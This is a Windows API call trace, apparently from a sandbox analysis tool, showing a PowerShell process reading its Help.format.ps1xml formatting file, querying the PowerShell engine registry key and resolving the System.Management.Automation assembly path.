	[0526.789] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x320
	[0526.789] GetFileType (hFile=0x320) returned 0x1
	[0526.789] SetErrorMode (uMode=0x1) returned 0x1
	[0526.790] GetFileType (hFile=0x320) returned 0x1
	[0526.790] ReadFile (in: hFile=0x320, lpBuffer=0x2e74340, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xecdb8, lpOverlapped=0x0 | out: lpBuffer=0x2e74340*, lpNumberOfBytesRead=0xecdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0526.791] ReadFile (in: hFile=0x320, lpBuffer=0x2e74340, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xecdb8, lpOverlapped=0x0 | out: lpBuffer=0x2e74340*, lpNumberOfBytesRead=0xecdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0526.791] ReadFile (in: hFile=0x320, lpBuffer=0x2e74340, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xecdb8, lpOverlapped=0x0 | out: lpBuffer=0x2e74340*, lpNumberOfBytesRead=0xecdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0526.791] ReadFile (in: hFile=0x320, lpBuffer=0x2e74340, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xecdb8, lpOverlapped=0x0 | out: lpBuffer=0x2e74340*, lpNumberOfBytesRead=0xecdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0526.791] ReadFile (in: hFile=0x320, lpBuffer=0x2e74340, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xecdb8, lpOverlapped=0x0 | out: lpBuffer=0x2e74340*, lpNumberOfBytesRead=0xecdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0526.791] ReadFile (in: hFile=0x320, lpBuffer=0x2e74340, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xecdb8, lpOverlapped=0x0 | out: lpBuffer=0x2e74340*, lpNumberOfBytesRead=0xecdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0526.792] ReadFile (in: hFile=0x320, lpBuffer=0x2e74340, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xecdb8, lpOverlapped=0x0 | out: lpBuffer=0x2e74340*, lpNumberOfBytesRead=0xecdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0526.792] ReadFile (in: hFile=0x320, lpBuffer=0x2e74340, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xecdb8, lpOverlapped=0x0 | out: lpBuffer=0x2e74340*, lpNumberOfBytesRead=0xecdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0526.792] ReadFile (in: hFile=0x320, lpBuffer=0x2e74340, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xecdb8, lpOverlapped=0x0 | out: lpBuffer=0x2e74340*, lpNumberOfBytesRead=0xecdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0526.793] ReadFile (in: hFile=0x320, lpBuffer=0x2e74340, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xecdb8, lpOverlapped=0x0 | out: lpBuffer=0x2e74340*, lpNumberOfBytesRead=0xecdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0526.793] ReadFile (in: hFile=0x320, lpBuffer=0x2e74340, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xecdb8, lpOverlapped=0x0 | out: lpBuffer=0x2e74340*, lpNumberOfBytesRead=0xecdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0526.793] ReadFile (in: hFile=0x320, lpBuffer=0x2e74340, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xecdb8, lpOverlapped=0x0 | out: lpBuffer=0x2e74340*, lpNumberOfBytesRead=0xecdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0526.793] ReadFile (in: hFile=0x320, lpBuffer=0x2e74340, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xecdb8, lpOverlapped=0x0 | out: lpBuffer=0x2e74340*, lpNumberOfBytesRead=0xecdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0526.794] ReadFile (in: hFile=0x320, lpBuffer=0x2e74340, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xecdb8, lpOverlapped=0x0 | out: lpBuffer=0x2e74340*, lpNumberOfBytesRead=0xecdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0526.794] ReadFile (in: hFile=0x320, lpBuffer=0x2e74340, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xecdb8, lpOverlapped=0x0 | out: lpBuffer=0x2e74340*, lpNumberOfBytesRead=0xecdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0526.794] ReadFile (in: hFile=0x320, lpBuffer=0x2e74340, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xecdb8, lpOverlapped=0x0 | out: lpBuffer=0x2e74340*, lpNumberOfBytesRead=0xecdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0526.795] ReadFile (in: hFile=0x320, lpBuffer=0x2e74340, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xecdb8, lpOverlapped=0x0 | out: lpBuffer=0x2e74340*, lpNumberOfBytesRead=0xecdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0526.795] ReadFile (in: hFile=0x320, lpBuffer=0x2e74340, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xecdb8, lpOverlapped=0x0 | out: lpBuffer=0x2e74340*, lpNumberOfBytesRead=0xecdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0526.796] ReadFile (in: hFile=0x320, lpBuffer=0x2e74340, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xecdb8, lpOverlapped=0x0 | out: lpBuffer=0x2e74340*, lpNumberOfBytesRead=0xecdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0526.796] ReadFile (in: hFile=0x320, lpBuffer=0x2e74340, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xecdb8, lpOverlapped=0x0 | out: lpBuffer=0x2e74340*, lpNumberOfBytesRead=0xecdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0526.796] ReadFile (in: hFile=0x320, lpBuffer=0x2e74340, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xecdb8, lpOverlapped=0x0 | out: lpBuffer=0x2e74340*, lpNumberOfBytesRead=0xecdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0526.797] ReadFile (in: hFile=0x320, lpBuffer=0x2e74340, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xecdb8, lpOverlapped=0x0 | out: lpBuffer=0x2e74340*, lpNumberOfBytesRead=0xecdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0526.797] ReadFile (in: hFile=0x320, lpBuffer=0x2e74340, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xecdb8, lpOverlapped=0x0 | out: lpBuffer=0x2e74340*, lpNumberOfBytesRead=0xecdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0526.797] ReadFile (in: hFile=0x320, lpBuffer=0x2e74340, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xecdb8, lpOverlapped=0x0 | out: lpBuffer=0x2e74340*, lpNumberOfBytesRead=0xecdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0526.797] ReadFile (in: hFile=0x320, lpBuffer=0x2e74340, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xecdb8, lpOverlapped=0x0 | out: lpBuffer=0x2e74340*, lpNumberOfBytesRead=0xecdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0526.798] ReadFile (in: hFile=0x320, lpBuffer=0x2e74340, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xecdb8, lpOverlapped=0x0 | out: lpBuffer=0x2e74340*, lpNumberOfBytesRead=0xecdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0526.798] ReadFile (in: hFile=0x320, lpBuffer=0x2e74340, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xecdb8, lpOverlapped=0x0 | out: lpBuffer=0x2e74340*, lpNumberOfBytesRead=0xecdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0526.798] ReadFile (in: hFile=0x320, lpBuffer=0x2e74340, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xecdb8, lpOverlapped=0x0 | out: lpBuffer=0x2e74340*, lpNumberOfBytesRead=0xecdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0526.798] ReadFile (in: hFile=0x320, lpBuffer=0x2e74340, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xecdb8, lpOverlapped=0x0 | out: lpBuffer=0x2e74340*, lpNumberOfBytesRead=0xecdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0526.799] ReadFile (in: hFile=0x320, lpBuffer=0x2e74340, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xecdb8, lpOverlapped=0x0 | out: lpBuffer=0x2e74340*, lpNumberOfBytesRead=0xecdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0526.799] ReadFile (in: hFile=0x320, lpBuffer=0x2e74340, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xecdb8, lpOverlapped=0x0 | out: lpBuffer=0x2e74340*, lpNumberOfBytesRead=0xecdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0526.799] ReadFile (in: hFile=0x320, lpBuffer=0x2e74340, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xecdb8, lpOverlapped=0x0 | out: lpBuffer=0x2e74340*, lpNumberOfBytesRead=0xecdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0526.802] ReadFile (in: hFile=0x320, lpBuffer=0x2e74340, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xecdb8, lpOverlapped=0x0 | out: lpBuffer=0x2e74340*, lpNumberOfBytesRead=0xecdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0526.802] ReadFile (in: hFile=0x320, lpBuffer=0x2e74340, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xecdb8, lpOverlapped=0x0 | out: lpBuffer=0x2e74340*, lpNumberOfBytesRead=0xecdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0526.802] ReadFile (in: hFile=0x320, lpBuffer=0x2e74340, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xecdb8, lpOverlapped=0x0 | out: lpBuffer=0x2e74340*, lpNumberOfBytesRead=0xecdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0526.802] ReadFile (in: hFile=0x320, lpBuffer=0x2e74340, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xecdb8, lpOverlapped=0x0 | out: lpBuffer=0x2e74340*, lpNumberOfBytesRead=0xecdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0526.803] ReadFile (in: hFile=0x320, lpBuffer=0x2e74340, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xecdb8, lpOverlapped=0x0 | out: lpBuffer=0x2e74340*, lpNumberOfBytesRead=0xecdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0526.803] ReadFile (in: hFile=0x320, lpBuffer=0x2e74340, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xecdb8, lpOverlapped=0x0 | out: lpBuffer=0x2e74340*, lpNumberOfBytesRead=0xecdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0526.803] ReadFile (in: hFile=0x320, lpBuffer=0x2e74340, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xecdb8, lpOverlapped=0x0 | out: lpBuffer=0x2e74340*, lpNumberOfBytesRead=0xecdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0526.803] ReadFile (in: hFile=0x320, lpBuffer=0x2e74340, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xecdb8, lpOverlapped=0x0 | out: lpBuffer=0x2e74340*, lpNumberOfBytesRead=0xecdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0526.804] ReadFile (in: hFile=0x320, lpBuffer=0x2e74340, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xecdb8, lpOverlapped=0x0 | out: lpBuffer=0x2e74340*, lpNumberOfBytesRead=0xecdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0526.804] ReadFile (in: hFile=0x320, lpBuffer=0x2e74340, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xecdb8, lpOverlapped=0x0 | out: lpBuffer=0x2e74340*, lpNumberOfBytesRead=0xecdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0526.804] ReadFile (in: hFile=0x320, lpBuffer=0x2e74340, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xecdb8, lpOverlapped=0x0 | out: lpBuffer=0x2e74340*, lpNumberOfBytesRead=0xecdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0526.804] ReadFile (in: hFile=0x320, lpBuffer=0x2e74340, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xecdb8, lpOverlapped=0x0 | out: lpBuffer=0x2e74340*, lpNumberOfBytesRead=0xecdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0526.805] ReadFile (in: hFile=0x320, lpBuffer=0x2e74340, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xecdb8, lpOverlapped=0x0 | out: lpBuffer=0x2e74340*, lpNumberOfBytesRead=0xecdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0526.805] ReadFile (in: hFile=0x320, lpBuffer=0x2e74340, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xecdb8, lpOverlapped=0x0 | out: lpBuffer=0x2e74340*, lpNumberOfBytesRead=0xecdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0526.805] ReadFile (in: hFile=0x320, lpBuffer=0x2e74340, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xecdb8, lpOverlapped=0x0 | out: lpBuffer=0x2e74340*, lpNumberOfBytesRead=0xecdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0526.805] ReadFile (in: hFile=0x320, lpBuffer=0x2e74340, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xecdb8, lpOverlapped=0x0 | out: lpBuffer=0x2e74340*, lpNumberOfBytesRead=0xecdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0526.806] ReadFile (in: hFile=0x320, lpBuffer=0x2e74340, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xecdb8, lpOverlapped=0x0 | out: lpBuffer=0x2e74340*, lpNumberOfBytesRead=0xecdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0526.806] ReadFile (in: hFile=0x320, lpBuffer=0x2e74340, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xecdb8, lpOverlapped=0x0 | out: lpBuffer=0x2e74340*, lpNumberOfBytesRead=0xecdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0526.806] ReadFile (in: hFile=0x320, lpBuffer=0x2e74340, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xecdb8, lpOverlapped=0x0 | out: lpBuffer=0x2e74340*, lpNumberOfBytesRead=0xecdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0526.806] ReadFile (in: hFile=0x320, lpBuffer=0x2e74340, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xecdb8, lpOverlapped=0x0 | out: lpBuffer=0x2e74340*, lpNumberOfBytesRead=0xecdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0526.807] ReadFile (in: hFile=0x320, lpBuffer=0x2e74340, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xecdb8, lpOverlapped=0x0 | out: lpBuffer=0x2e74340*, lpNumberOfBytesRead=0xecdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0526.807] ReadFile (in: hFile=0x320, lpBuffer=0x2e74340, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xecdb8, lpOverlapped=0x0 | out: lpBuffer=0x2e74340*, lpNumberOfBytesRead=0xecdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0526.807] ReadFile (in: hFile=0x320, lpBuffer=0x2e74340, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xecdb8, lpOverlapped=0x0 | out: lpBuffer=0x2e74340*, lpNumberOfBytesRead=0xecdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0526.807] ReadFile (in: hFile=0x320, lpBuffer=0x2e74340, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xecdb8, lpOverlapped=0x0 | out: lpBuffer=0x2e74340*, lpNumberOfBytesRead=0xecdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0526.807] ReadFile (in: hFile=0x320, lpBuffer=0x2e74340, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xecdb8, lpOverlapped=0x0 | out: lpBuffer=0x2e74340*, lpNumberOfBytesRead=0xecdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0526.808] ReadFile (in: hFile=0x320, lpBuffer=0x2e74340, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xecdb8, lpOverlapped=0x0 | out: lpBuffer=0x2e74340*, lpNumberOfBytesRead=0xecdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0526.808] ReadFile (in: hFile=0x320, lpBuffer=0x2e74340, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xecdb8, lpOverlapped=0x0 | out: lpBuffer=0x2e74340*, lpNumberOfBytesRead=0xecdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0526.808] ReadFile (in: hFile=0x320, lpBuffer=0x2e74340, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xecdb8, lpOverlapped=0x0 | out: lpBuffer=0x2e74340*, lpNumberOfBytesRead=0xecdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0526.808] ReadFile (in: hFile=0x320, lpBuffer=0x2e74340, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xecdb8, lpOverlapped=0x0 | out: lpBuffer=0x2e74340*, lpNumberOfBytesRead=0xecdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0526.808] ReadFile (in: hFile=0x320, lpBuffer=0x2e74340, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xecdb8, lpOverlapped=0x0 | out: lpBuffer=0x2e74340*, lpNumberOfBytesRead=0xecdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0526.808] ReadFile (in: hFile=0x320, lpBuffer=0x2e74340, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xecdb8, lpOverlapped=0x0 | out: lpBuffer=0x2e74340*, lpNumberOfBytesRead=0xecdb8*=0xf37, lpOverlapped=0x0) returned 1
	[0526.809] ReadFile (in: hFile=0x320, lpBuffer=0x2e739df, nNumberOfBytesToRead=0xc9, lpNumberOfBytesRead=0xecdb8, lpOverlapped=0x0 | out: lpBuffer=0x2e739df*, lpNumberOfBytesRead=0xecdb8*=0x0, lpOverlapped=0x0) returned 1
	[0526.809] ReadFile (in: hFile=0x320, lpBuffer=0x2e74340, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xecdb8, lpOverlapped=0x0 | out: lpBuffer=0x2e74340*, lpNumberOfBytesRead=0xecdb8*=0x0, lpOverlapped=0x0) returned 1
	[0526.809] CloseHandle (hObject=0x320) returned 1
	[0526.809] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0xecb00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0526.809] SetErrorMode (uMode=0x1) returned 0x1
	[0526.809] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xecd60 | out: lpFileInformation=0xecd60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e51ae9, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e51ae9, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e9c3af, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3ef37)) returned 1
	[0526.810] SetErrorMode (uMode=0x1) returned 0x1
	[0526.810] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0xeca90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0526.810] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xece48 | out: phkResult=0xece48*=0x320) returned 0x0
	[0526.810] RegQueryValueExW (in: hKey=0x320, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xecdcc, lpData=0x0, lpcbData=0xecdc8*=0x0 | out: lpType=0xecdcc*=0x1, lpData=0x0, lpcbData=0xecdc8*=0x56) returned 0x0
	[0526.810] CoTaskMemAlloc (cb=0x5a) returned 0x32ca00
	[0526.810] RegQueryValueExW (in: hKey=0x320, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xecd9c, lpData=0x32ca00, lpcbData=0xecd98*=0x56 | out: lpType=0xecd9c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xecd98*=0x56) returned 0x0
	[0526.810] CoTaskMemFree (pv=0x32ca00) 
	[0526.810] RegCloseKey (hKey=0x320) returned 0x0
	[0526.810] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0xeca90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0526.810] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0xec940, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0526.815] CoCreateGuid (in: pguid=0xed070 | out: pguid=0xed070*(Data1=0x440065fa, Data2=0xfeb7, Data3=0x4cf6, Data4=([0]=0x91, [1]=0x27, [2]=0x59, [3]=0xe8, [4]=0x9c, [5]=0x8f, [6]=0x59, [7]=0xd3))) returned 0x0
	[0526.816] CoCreateGuid (in: pguid=0xed070 | out: pguid=0xed070*(Data1=0xe0770dd5, Data2=0xc1ed, Data3=0x456a, Data4=([0]=0xb3, [1]=0xd0, [2]=0x62, [3]=0xe6, [4]=0x2, [5]=0x73, [6]=0x67, [7]=0x9c))) returned 0x0
	[0526.816] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0526.816] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec460, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0526.817] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec460, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0526.817] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec460, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0527.649] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0527.649] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec460, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0527.650] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec460, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0527.650] CoCreateGuid (in: pguid=0xed070 | out: pguid=0xed070*(Data1=0xc94066cb, Data2=0x7257, Data3=0x4e64, Data4=([0]=0x93, [1]=0x57, [2]=0xf0, [3]=0x5d, [4]=0x3b, [5]=0x1d, [6]=0xee, [7]=0x9c))) returned 0x0
	[0527.650] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0527.651] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec0a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0527.651] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec0a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0527.651] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0527.651] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec0a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0527.651] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec0a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
